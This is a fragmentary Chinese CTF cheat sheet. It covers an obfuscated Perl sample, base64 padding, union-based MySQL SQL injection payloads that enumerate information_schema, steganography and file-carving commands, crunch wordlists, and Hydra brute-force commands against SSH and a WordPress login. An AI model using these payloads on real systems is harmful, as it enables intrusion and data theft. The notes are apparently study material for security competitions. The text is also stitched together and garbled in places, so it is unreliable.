F12
打开Console控制台
,粘贴密文按回车即可解密length q closedir vec and print chr ord q open no and print chr ord q or no and print chr ord q sin s and print chr ord qw q ne q and print chr ord q lt eval and print chr ord q q eq and print chr length q q ge getc getpriority printf split q and print chr ord qw q fcntl q and print chr ord qw q lc q and print chr ord q each le and print chr ord qw q ge q and print chr length q q readdir ge chop link syscall chroot binmode for length setservent dbmopen uc getnetbyname getpwnam rename stat study pack q and print chr ord q open no and print chr ord q split s and print chr oct hex ord uc q my m and print chr ord q ge log and print chr ord qw q ne q and print chr ord q oct no and print chr ord q pop and print chr ord qw q die q and print chr ord q ge log and print chr oct oct hex ord q ref or and print chr length q q ge getc getpriority printf split q
A-Z、a-z、0-9,+、/
,共64个可打印字符;如果要编码的字节数不能被3整除,最后会多出1个或2个字节,那么可以使用下面的方法进行处理:先使用0字节值在末尾补足,使其能够被3整除,然后再进行base64的编码。在编码后的base64文本后加上一个或两个“=”号,代表补足的字节数。也就是说,当最后剩余一个八位字节(一个byte)时,最后6位的base64字节块有四位是0值,最后附加上两个等号;如果最后剩余两个八位字节(2byte)时,最后一个6位的base字节块有两位是0值,最后附加一个等号F12
打开Console控制台
,粘贴密文按回车即可解密T
列 和 密钥字母C
行 -> 交点为 密文V
)- and 1=1 -> 正常
- and 1=2 -> 报错
--> 发现页面显示不一样,是注入点
(mysql>5.0的版本才有information_schema,存储着mysql 所有库和表结构信息)
1. 查看当前使用数据库
- and 1=2 union select 1,database()
2. 爆表
- union select 1,table_name from information_schema.tables where table_schema='当前库名'
3. 查看当前表中字段
- union select 1,column_name from information_schema.columns where table_schema='当前库名'
4. 爆字段内容
- and 1=1 union select 1,2
5. 查看列
- union select 1,列名 from 表名
6. 爆出所有库
- union select 1,schema_name from information_schema.schemata
- and 1=2 union select 1,group_concat(SCHEMA_NAME) from information_schema.schemata
- order by a
- order by b
--> 若发现a正常b不正常,则字段数是a
and 1=2 union select 1,2
select * from db WHERE id= x and 1=2 Union select 1,2,3,4,5
- and 1=2 union select 1,version() ----- 查看数据库版本
- and 1=2 union select 1,database() ---- 查看当前使用的数据库
- and 1=2 union select 1,user() ------查看当前数据库用户
- and ord(mid(user(),1,1))=114 ------ 判断用户是否为root
第一个数据库
- and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1
第二个数据库
- and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1
第三个数据库
- and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 2,2
第四个数据库
- and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 3,3
第五个数据库
- and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 4,
默认分离
binwalk -e xxx.xxx
dd命令分离
# dd if=xxx.xx of=a.xxx skip=12345 bs=1
[ if是指定输入文件,of是指定输出文件,skip是指定从输入文件开头跳过12345个块后再开始复制,bs设置每次读写块的大小为1字节 ]
Decode -X -P password xxx.mp3
加密:encode -E (里面放要加密的txt信息) -P (密码) (需要将密码放入的wav文件) (生产的mp3文件)
解密:decode -X -P (密码)(要解密的文件)
java Extract xxx.jpg -p password
伪加密解压命令 java -jar ZipCenOp.jar r xxxx.zip
Crunch字典生成器路径:/usr/share/crunch
crunsh MinSize MaxSize 字典元素(如123456) -o 存放文本名(a.txt)
#命令
先nmap扫一波端口
hydra -l root(用户名,或-L+字典) -P unix_passwords.txt(字典) IP -v ssh(服务)
例:hydra -l admin -P unix_passwords.txt 172.26.16.128 */wp-login.php:log=^USER^&pwd=^PASS^ :"login_error"
字典路径:/usr/share/wordlists/
/usr/share/wordlists/metasploit
unix_passwords.txt //小字典
password.lst //大字典
unix_users.txt //用户名
windows常用用户名 administrator/admin
-R 修复之前使用的aborted/crashed session
-S 执行SSL(Secure Socket Layer)连接
-s Port 使用非默认服务器端口而是其他端口时,指定其端口
-l Login 已经获取登录ID的情况下输入登录ID
-L FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)
-p Pass 已经获取登录密码的情况下输入登录密码
-P FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)
-x MIN:MAX:CHARSET 暴力破解时不指定文件,而生成可满足指定字符集和最短、最长长度条件的密码来暴力破解
-C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式
-M FILE指定实施并列攻击的文件服务器的目录文件
-o FILE以STDOUT的形式输出结果值
-f 查找到第一个可以使用的ID和密码的时候停止破解
-t TASKS 指定并列连接数(默认值:16)
-w 指定每个线程的回应时间(Waittime)(默认值:32秒)
-4/6 指定IPv4/IPv6(默认值:IPv4)
-v/-V显示详细信息
-U 查看服务器组件使用明细
get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
post方式提交,破解web登录: